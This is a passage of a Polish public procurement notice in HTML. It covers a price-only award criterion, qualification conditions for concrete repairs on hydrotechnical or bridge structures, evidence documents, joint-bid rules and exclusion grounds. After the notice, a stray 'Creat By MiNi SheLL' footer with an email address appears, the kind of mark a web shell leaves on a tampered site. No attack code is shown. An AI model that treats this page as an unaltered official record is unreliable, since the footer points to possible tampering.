badanej.<br/>Maksymalna liczba punktów jaka może otrzymać oferta wynosi 100 pkt.<br/>3. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryterium oceny ofert określonych w SWZ. Za najkorzystniejszą<br/>zostanie uznana oferta, która uzyska największą liczbę punktów obliczoną zgodnie ze wzorem określonym w powyższym pkt 2.1.<br/>4. Punktacja przyznawana ofertom w kryterium oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z<br/>zasadami arytmetyki.<br/>5. W przypadku, gdy dwie lub więcej ofert przedstawia taki sam bilans ceny Zamawiający wezwie Wykonawców, którzy złożyli te<br/>oferty do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawca zobowiązany jest wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej 1 robotę budowlaną na obiektach<br/>hydrotechnicznych lub mostowych w zakres której wchodziło wykonanie remontu betonów a wartość robót dotyczących<br/>remontu betonów wynosiła co najmniej 60 000,00 zł brutto.<br/>Uwaga:<br/>- przez jedną robotę należy rozumieć jedną umowę;<br/>- niedopuszczalne jest sumowanie zrealizowanych przez różne podmioty zamówień (umów),<br/>w celu wykazania spełniania warunku;<br/>- w przypadku, gdy w ramach zamówienia realizowany był szerszy zakres prac, należy podać zakres i wartość robót<br/>potwierdzających spełnienie warunku określonego przez Zamawiającego;<br/>- Zamawiający informuje, iż w przypadku wykazywania na potrzeby potwierdzania spełniania przez Wykonawcę niniejszego<br/>warunku udziału w postępowaniu doświadczenia w realizacji zadania wykonanego przez grupę Wykonawców (np.<br/>konsorcjum), za miarodajne z punktu widzenia wykazania spełniania tego warunku zostanie uznane jedynie doświadczenie<br/>polegające na faktycznej realizacji prac wskazanych w treści warunku. Nie zostanie uznane za potwierdzenie spełniania<br/>tego warunku legitymowanie się nabyciem doświadczenia w realizacji zadania wykonanego przez grupę wykonawców (np.<br/>konsorcjum) jedynie poprzez fakt bycia jednym z członków tej grupy (np. członkiem konsorcjum), jeżeli faktycznie nie<br/>zrealizowało się w ramach tego zadania prac wskazanych w treści tego warunku, chyba że Wykonawca wykaże, iż nawet<br/>pomimo braku faktycznej realizacji w ramach danego zadania wskazanych w warunku prac to jednak zakres i przedmiot<br/>czynności, obowiązków i odpowiedzialności faktycznie odnosił się do całości zadania (tj. również do prac faktycznie<br/>niewykonywanych), co oznaczałoby nabycie doświadczenia odnośnie całości jego / ich przedmiotu.<br/>Na potwierdzenie spełniania w/w warunku Wykonawca złoży Wykaz robót budowlanych zgodny z Załącznikiem nr 6 do<br/>SWZ.<br/>2. Wykonawca zobowiązany jest wykazać, że na potrzeby realizacji zamówienia będzie dysponował osobą lub osobami<br/>posiadającymi kwalifikacje, wykształcenie, doświadczenie niezbędne do należytego wykonania zamówienia, w<br/>szczególności:<br/>a) co najmniej 1 osobą przewidzianą do pełnienia funkcji Kierownika Budowy, posiadającą uprawnienia budowlane do<br/>kierowania robotami w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994r. (tj. Dz.U z 2023r. poz. 682 ze zm.) w<br/>specjalności konstrukcyjno-budowlanej lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej<br/>obowiązujących przepisów i która jest członkiem właściwej izby samorządu zawodowego tj. Polskiej Izby Inżynierów<br/>Budownictwa.<br/>Na potwierdzenie spełniania w/w warunku Wykonawca złoży Wykaz osób zgodny z Załącznikiem nr 5 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Pełnomocnictwo - w<br/>przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty podpisuje pełnomocnik.<br/>2. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodne w treści z Załącznikiem nr 7 do SWZ<br/>(jeżeli dotyczy)<br/>3. Oświadczenie Wykonawcy/ Wykonawcy wspólnie ubiegającego się o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu, zgodne w treści z Załącznikiem nr 8 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że Wykonawca<br/>nie podlega wykluczeniu z postępowania zgodnie z pkt. 7 SWZ. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4. Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, zgodne w treści z Załącznikiem nr 9<br/>do SWZ, aktualne na dzień składania ofert, dotyczące innych podmiotów na których zasoby powołuje się Wykonawca, celem<br/>wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania w zakresie w jakim Wykonawca powołuje się na ich<br/>zasoby, warunków udziału w postępowaniu.<br/>5. Dowód potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami innych podmiotów, który<br/>stanowi w szczególności zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienia, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Przykładowy wzór zobowiązania stanowi Załącznik nr 13 do SWZ.<br/>6. Dokument Self cleaning - (należy złożyć wraz z ofertą – jeśli dotyczy) – w okolicznościach określonych w ustawie Wykonawca nie<br/>podlega wykluczeniu, jeżeli udowodni Zamawiającemu, że spełnił łącznie następujące przesłanki określone w art. 110 ust. 2 pzp.<br/>7. Oświadczenie Wykonawcy/ Wykonawcy wspólnie ubiegającego/ podmiotu udostępniającego zasoby o aktualności informacji<br/>zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 (lub odpowiednio 125 ust.5) ustawy w zakresie podstaw wykluczenia z art. 108 ust. 1 i 109 ust. 1<br/>pkt. 4,8,9 ustawy Pzp, zgodnego ze wzorem stanowiącym Załącznik nr 10 do SWZ.<br/>8. Oświadczenie Wykonawcy/ Wykonawcy wspólnie ubiegającego/ podmiotu udostępniającego zasoby o aktualności informacji<br/>zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 (lub odpowiednio 125 ust.5) ustawy w zakresie podstaw wykluczenia z<br/>art. 7 ust . ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zgodnego ze wzorem stanowiącym Załącznik nr 11 do SWZ.<br/>9. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w<br/>celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>10. Oświadczenie Wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r.<br/>o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącymZałącznik nr 12 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, odbiorców, dat i miejsca wykonania oraz podmiotów na rzecz których<br/>roboty te zostały wykonane wraz z dowodami potwierdzającymi, że roboty te te zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty (uzupełnione w zakresie informacji wymaganych dla spełnienia warunku udziału w postępowaniu). Wzór wykazu robót<br/>stanowi Załącznik Nr 6 do SWZ. Wykaz robót w sposób jednoznaczny musi potwierdzać spełnienie przez Wykonawcę warunku<br/>udziału w postępowaniu określony w rozdz. 7 ppkt.7.2.4.1 SWZ.<br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez<br/>nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz osób w sposób jednoznaczny musi potwierdzać<br/>spełnienie przez Wykonawcę warunku udziału w niniejszym postępowaniu określony w rozdz. 7 pkt. 7.2.4.2 SWZ. Wzór wykazu<br/>osób stanowi Załącznik nr 5 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w<br/>rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego. 2. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego<br/>adres należy wpisać w Formularzu oferty. 3. Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z<br/>którego wynika takie pełnomocnictwo należy złożyć razem z ofertą. 4. W odniesieniu do warunków określonych w pkt 7.2<br/>SWZ, wymagania te muszą być<br/>spełnione wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z Wykonawców<br/>składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 10.4 SWZ. 5. Każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 8 do SWZ,<br/>aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o zamówienie<br/>nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp, art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa oraz spełnia warunki udziału w postępowaniu określone w SWZ w zakresie, w<br/>którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu. 6.<br/>Każdy z Wykonawców występujących wspólnie zobowiązany jest do wykazania braku podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt<br/>10.3 SWZ składa każdy z Wykonawców występujących wspólnie. 7. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia, spośród których tylko jeden spełnia warunek dotyczący posiadania uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni Wykonawcy. 8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji<br/>wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa zostanie zawarta według Wzoru umowy, stanowiącego Załącznik Nr 4 do SWZ. 2. Wykonawca akceptuje treść<br/>Wzoru umowy na wykonanie przedmiotu zamówienia, stanowiący Załącznik Nr 4 do SWZ, oświadczeniem zawartym w<br/>treści Formularza oferty. Postanowienia umowy ustalone we Wzorze nie podlegają zmianie przez Wykonawcę. Przyjęcie<br/>przez Wykonawcę postanowień Wzoru umowy stanowi jeden z wymogów ważności oferty. 3. Na podstawie art. 455 ust. 1 ustawy Pzp, Zamawiający informuje, że przewiduje możliwość zmian postanowień zawartej<br/>umowy w przypadkach określonych we Wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy zakupowej.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się, z zastrzeżeniem art. 110 ust. 2 ustawy Pzp, Wykonawcę, na<br/>podstawie:<br/>1.1 art. 108 ust. 1 ustawy Pzp;<br/>1.2 art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>1.3 art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (DZ.U. z 2022, poz. 835):<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r.<br/>o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z<br/>2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu<br/>269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została<br/>wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/>1 pkt 3 ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą<br/>w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r.<br/>o rachunkowości (Dz. U. z 2021 r. poz. 217,2105 i 2106), jest podmiot wymieniony w wykazach określonych w<br/>rozporządzeniu765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24<br/>lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com